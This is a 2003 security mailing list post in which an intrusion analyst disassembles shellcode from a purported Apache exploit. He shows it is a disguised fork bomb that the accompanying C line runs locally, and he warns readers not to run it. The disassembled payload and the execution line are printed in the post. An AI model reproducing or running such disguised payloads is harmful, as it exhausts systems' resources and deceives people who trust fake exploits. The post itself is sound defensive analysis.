On Friday 20 June 2003 11:15 am, Michael wrote: > Maybe now we can STFU and concentrate on actual disclosure? > I'm curious as to why there has been no discussion about this apache > report. > > The poster of this message didnt include any info on the details of the > problem nor an exploit, which leaves us wondering. (The insult was cute > though)
There was exploit code included in the message I got. Taking apart the shellcode we see: 0: 31 db xor %ebx,%ebx 2: 31 c0 xor %eax,%eax 4: 31 d2 xor %edx,%edx 6: b2 18 mov $0x18,%dl 8: 68 20 3f 21 0a push $0xa213f20 ; " ?!\n" d: 68 54 52 31 58 push $0x58315254 ; "TR1X" 12: 68 65 20 4d 34 push $0x344d2065 ; "e M4" 17: 68 73 20 54 68 push $0x68542073 ; "s Th" 1c: 68 61 74 20 69 push $0x69207461 ; "at i" 21: 68 2d 2d 57 68 push $0x68572d2d ; "--Wh" 26: 89 e1 mov %esp,%ecx ; pointer to string 28: b0 04 mov $0x4,%al 2a: cd 80 int $0x80 ; syscall_write 2c: b8 02 00 00 00 mov $0x2,%eax 31: cd 80 int $0x80 ; syscall_fork 33: eb f7 jmp 0x2c ; loop ... garbage code follows So, the shellcode is a fork bomb, printing "--What is The M4TR1X ?!" over and over until the system can no longer fork processes. Looking at the C code, we see this line: void(*b)()=(void*)shellcode;b(); Which executes the shellcode locally. In other words, don't run this. -Joe -- Joe Stewart, GCIH Senior Intrusion Analyst LURHQ Corporation http://www.lurhq.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
